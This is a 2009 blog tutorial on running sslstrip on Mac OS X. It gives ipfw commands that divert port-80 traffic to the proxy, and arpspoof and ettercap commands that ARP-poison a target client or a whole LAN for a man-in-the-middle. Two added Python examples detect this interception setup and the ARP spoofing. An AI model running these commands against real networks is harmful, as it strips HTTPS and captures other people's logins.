Monday, May 4, 2009

SSL Strip on Mac OS X

After playing around with SSL Strip for a while on BackTrack 4, I decided to try getting it up and running on my MacBook. It turns out it was actually quite easy!

The first thing to do is download the SSL Strip package from Moxie Marlinspike's homepage. You can grab it from the link above.

Next, if you're using MacPorts Python 2.5, like I am, you'll need to:

sudo port install py25-socket-ssl

The MacPorts Python 2.5 port maintainer decided to split the SSL socket module into a separate package for some reason, so you'll need to install it as shown.

Now, you'll need to make sure your Mac is configured to do IP forwarding and that the IP firewall (ipfw) is enabled. Use the following commands to check the current values:

sysctl net.inet.ip.forwarding
sysctl net.inet.ip.fw.enable


If either of those is disabled (reports 0), set them like so:

sudo sysctl -w net.inet.ip.forwarding=1
sudo sysctl -w net.inet.ip.fw.enable=1


Now your system should be set up to forward IP traffic and to apply firewall rules.

The firewall rules can now be modified to forward all port 80 traffic to the port which SSL Strip will listen on. If you want to listen on 1234, for example, the following ipfw command will set you up:

ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80

The add fwd 127.0.0.1,1234 part tells ipfw to add a new rule that forwards matching traffic to 127.0.0.1 on port 1234. The rest of the command is the match logic that decides which traffic gets forwarded. tcp obviously restricts the rule to TCP traffic. from not me to any matches traffic sent from any address other than your own IP to any destination. If you instead use any to any, I found that SSL Strip's own outbound connections to port 80 also match the rule and get redirected back to itself, which causes problems. Finally, the 80 specifies that only TCP traffic destined for the HTTP port will be forwarded.
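The three settings above (IP forwarding on, ipfw on, a fwd rule diverting port 80 to a local port) are also exactly what you would look for when checking whether a shared Mac has been turned into a transparent port-80 interception point. The following is an added example, not code from the post or from the sslstrip project: it parses the output of the sysctl and ipfw list commands discussed above and reports those three findings together. The sample command output is constructed for the example (the rule numbers are made up); on a real host you would feed in the actual stdout of sysctl and sudo ipfw list.

```python
"""Audit helper: given the text of `sysctl net.inet.ip.forwarding
net.inet.ip.fw.enable` and `sudo ipfw list`, report whether the host forwards
IP traffic, has ipfw enabled, and carries an ipfw fwd rule that diverts port 80
to a local proxy port. Sample outputs below are constructed, not captured."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample of: sysctl net.inet.ip.forwarding net.inet.ip.fw.enable
SAMPLE_SYSCTL = """\
net.inet.ip.forwarding: 1
net.inet.ip.fw.enable: 1
"""

# Constructed sample of: sudo ipfw list (rule numbers are made up; ipfw prints
# a port given as 'to any 80' at add time as 'to any dst-port 80')
SAMPLE_IPFW_LIST = """\
00100 fwd 127.0.0.1,1234 tcp from not me to any dst-port 80
00200 allow ip from any to any
65535 deny ip from any to any
"""

# Matches ipfw 'fwd' rules in either the form typed at add time
# (... to any 80) or the normalized 'ipfw list' form (... to any dst-port 80),
# tolerating trailing options such as 'in via en1'.
FWD_RULE = re.compile(
    r"^(?P<num>\d+)\s+fwd\s+(?P<addr>[\d.]+)(?:,(?P<port>\d+))?\s+"
    r"(?P<proto>\S+)\s+from\s+(?P<src>.+?)\s+to\s+(?P<dst>\S+)"
    r"(?:\s+(?:dst-port\s+)?(?P<dport>[\d,-]+))?(?:\s.*)?$"
)


@dataclass
class AuditResult:
    ip_forwarding: bool
    firewall_enabled: bool
    port80_redirects: List[dict] = field(default_factory=list)

    @property
    def looks_like_interception(self) -> bool:
        # All three together are what the post configures; any one alone is
        # common on an innocent host (Internet Sharing turns on forwarding).
        return self.ip_forwarding and self.firewall_enabled and bool(self.port80_redirects)


def parse_sysctl(text: str) -> Dict[str, str]:
    """Turn 'key: value' lines from sysctl into a dict."""
    values = {}
    for line in text.splitlines():
        key, sep, val = line.partition(":")
        if sep:
            values[key.strip()] = val.strip()
    return values


def covers_port(spec: str, port: int) -> bool:
    """True if an ipfw port spec such as '80', '80,8080' or '80-90' includes port."""
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        if not lo:
            continue
        if hi and int(lo) <= port <= int(hi):
            return True
        if not hi and int(lo) == port:
            return True
    return False


def find_port80_redirects(ipfw_text: str) -> List[dict]:
    """Return every fwd rule that diverts TCP (or all-IP) traffic bound for port 80."""
    hits = []
    for raw in ipfw_text.splitlines():
        line = raw.strip()
        m = FWD_RULE.match(line)
        if not m:
            continue
        dport = m.group("dport")
        if m.group("proto") not in ("tcp", "ip") or not dport:
            continue
        if covers_port(dport, 80):
            hits.append({
                "rule": m.group("num"),
                # no ',port' on the fwd target means 'same port as the packet'
                "target": f"{m.group('addr')}:{m.group('port') or 'same'}",
                "src": m.group("src"),
                "dst": m.group("dst"),
                "line": line,
            })
    return hits


def audit(sysctl_text: str, ipfw_text: str) -> AuditResult:
    s = parse_sysctl(sysctl_text)
    return AuditResult(
        ip_forwarding=s.get("net.inet.ip.forwarding") == "1",
        firewall_enabled=s.get("net.inet.ip.fw.enable") == "1",
        port80_redirects=find_port80_redirects(ipfw_text),
    )


if __name__ == "__main__":
    result = audit(SAMPLE_SYSCTL, SAMPLE_IPFW_LIST)
    print(f"ip forwarding: {result.ip_forwarding}, ipfw enabled: {result.firewall_enabled}")
    for hit in result.port80_redirects:
        print(f"rule {hit['rule']} diverts port 80 -> {hit['target']}: {hit['line']}")
    print("looks like a transparent port-80 interception setup:", result.looks_like_interception)
```

The check deliberately requires all three conditions before calling the host an interception point: forwarding alone is what Internet Sharing needs, and a fwd rule with ipfw disabled does nothing.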

Finally, with that rule set up, all that needs to be done is to run SSL Strip. python sslstrip.py -h shows the following options:

sslstrip 0.2 by Moxie Marlinspike
Usage: sslstrip

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.


So, the basic python sslstrip.py -l 1234 should get you started.

The kill session and favicon options are handy, so those are worth checking out. Also, the -a option is handy if you need to debug things or just want a dump of all traffic which is running through the proxy.

I think that's about it for all the configuring. Running and parsing the results of SSL Strip is something I'm sure you all can figure out.

Let me know if any of the above steps don't work for you. Otherwise, happy hacking, don't do anything mean and as usual, have fun!


Update 05/18/2009 -
After seeing Ivan's question, I realized I didn't provide anything on how to convince people to connect through you instead of the default gateway. Oops! Well, here's the rest:

I used arpspoof when setting up sslstrip for the first time because I'm more used to it and I also find it easier to target individual clients. Also, I think it reduces my chances of breaking connectivity on the entire LAN if my ipfw config was off.

So, what I did in my initial testing was:

arpspoof -i en1 -t 192.168.1.101 192.168.1.1

Where en1 is my Mac's AirPort adapter, 192.168.1.101 is the client I'm attempting to MITM, and 192.168.1.1 is the address I'm spoofing, which is the default gateway for my LAN.

I didn't use ettercap with sslstrip, but if I remember my ettercap correctly, you can use it to attack an entire LAN like so:

ettercap -i en1 -Tq -M arp /192.168.1.1/ // -P autoadd

In this example, -Tq enables just the console interface in quiet mode, -M arp instructs ettercap to use ARP poisoning for the MITM, and /192.168.1.1/ // instructs it to poison all connections between the gateway and any other hosts on the LAN. Finally, -P autoadd enables the autoadd plugin so that new hosts are poisoned upon connecting to the LAN. You may need to use -M arp:remote, which enables ettercap to sniff remote connections, but I think you'll be fine without it.
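From the other side of the wire, both of the commands above leave the same trace in a victim's ARP table: the gateway's IP suddenly maps to a different MAC, and that MAC now answers for more than one IP (the attacking host's own address plus the gateway's). The following added example, not code from the post or from the arpspoof/ettercap projects, parses successive arp -a snapshots in the format macOS prints, pins the gateway's known-good MAC, and raises an alert on either symptom. The snapshots, addresses and MACs below are constructed for the example.

```python
"""Detection of the ARP poisoning step from the victim's side: compare
successive `arp -a` snapshots on a Mac against a pinned gateway MAC and flag
(1) the gateway's MAC changing and (2) one MAC answering for several IPs.
All snapshots and addresses below are constructed for this example."""
import re
from typing import Dict, List, Tuple

# macOS `arp -a` prints lines like:
#   ? (192.168.1.1) at 0:11:22:33:44:55 on en1 ifscope [ethernet]
# Octets are not zero-padded, hence the normalisation below.
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at "
    r"(?P<mac>(?:[0-9a-fA-F]{1,2}:){5}[0-9a-fA-F]{1,2})"
)
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"

# Constructed: the LAN as the victim sees it before anything happens.
SNAPSHOT_CLEAN = """\
? (192.168.1.1) at 0:11:22:33:44:55 on en1 ifscope [ethernet]
? (192.168.1.105) at a:bb:cc:dd:ee:ff on en1 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en1 ifscope [ethernet]
"""

# Constructed: the same LAN after the host at .105 has started claiming
# the gateway's address; the gateway entry now carries .105's MAC.
SNAPSHOT_POISONED = """\
? (192.168.1.1) at a:bb:cc:dd:ee:ff on en1 ifscope [ethernet]
? (192.168.1.105) at a:bb:cc:dd:ee:ff on en1 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en1 ifscope [ethernet]
"""


def normalize_mac(mac: str) -> str:
    """Zero-pad each octet and lower-case, so '0:11:...' == '00:11:...'."""
    return ":".join(octet.zfill(2).lower() for octet in mac.split(":"))


def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IP -> normalized MAC; '(incomplete)' entries have no MAC and are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = normalize_mac(m.group("mac"))
    return table


class ArpWatch:
    """Holds the trusted gateway mapping and checks snapshots against it."""

    def __init__(self, gateway_ip: str, trusted_gateway_mac: str):
        self.gateway_ip = gateway_ip
        self.gateway_mac = normalize_mac(trusted_gateway_mac)

    def check(self, snapshot_text: str) -> List[Tuple[str, str]]:
        """Return (alert_kind, detail) pairs; an empty list means nothing suspicious."""
        table = parse_arp_table(snapshot_text)
        alerts = []

        # Symptom 1: the pinned gateway IP now resolves to a different MAC.
        current = table.get(self.gateway_ip)
        if current is not None and current != self.gateway_mac:
            alerts.append(("gateway_mac_changed",
                           f"{self.gateway_ip} expected {self.gateway_mac} "
                           f"but the table now says {current}"))

        # Symptom 2: one MAC answers for several IPs (attacker's own IP + gateway).
        by_mac: Dict[str, List[str]] = {}
        for ip, mac in table.items():
            if mac != BROADCAST_MAC:
                by_mac.setdefault(mac, []).append(ip)
        for mac, ips in by_mac.items():
            if len(ips) > 1:
                alerts.append(("duplicate_mac",
                               f"{mac} answers for {', '.join(sorted(ips))}"))
        return alerts


if __name__ == "__main__":
    watch = ArpWatch("192.168.1.1", "00:11:22:33:44:55")
    for name, snap in (("clean", SNAPSHOT_CLEAN), ("poisoned", SNAPSHOT_POISONED)):
        print(f"{name}: {watch.check(snap) or 'no alerts'}")
```

On a real Mac you would run arp -a periodically and pass each output to check(); the gateway MAC to pin comes from a snapshot taken on a network you trust. Note the second check will also fire for a legitimately multi-homed device (a router that owns both .1 and .254, say), so pin such known duplicates rather than treat every hit as hostile.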

Hope this helps!